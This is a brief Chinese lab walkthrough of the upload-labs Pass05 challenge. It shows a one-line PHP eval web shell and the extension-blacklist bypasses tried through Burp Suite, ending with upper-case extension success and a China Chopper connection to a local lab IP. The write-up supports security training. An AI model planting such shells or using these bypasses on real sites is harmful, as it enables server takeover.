一、Pass05
1、上传一个shell.php
shell.php内容为:<?php @eval($_POST['123']);?>
//结果如下图所示,提示我们此文件不允许上传
2、扩展名黑名单绕过方法:
①、上传,shell.php.jpg
//尝试是否存在apache的解析漏洞
//结果,不能解析
②、上传.htaccess
//尝试,是否被过滤
//结果,被过滤
③、打开代理,启动BP,上传shell.php,拦截,在文件名的收尾去加点
//被过滤
④、打开代理,启动BP,上传shell.php,拦截,在文件名的收尾加空格
//被过滤
⑤、打开代理,启动BP,上传shell.php,拦截,在文件名的收尾加::$DATA
//被过滤
⑥、打开代理,启动BP,上传shell.php,对文件名的扩展名,大小写绕过
//形如:shell.PHP或者shell.PHp
如下图所示,上传成功,且上传点为:http://192.168.97.139/upload-labs/upload/
3、菜刀连接http://192.168.97.139/upload-labs/upload/shell.PHP即可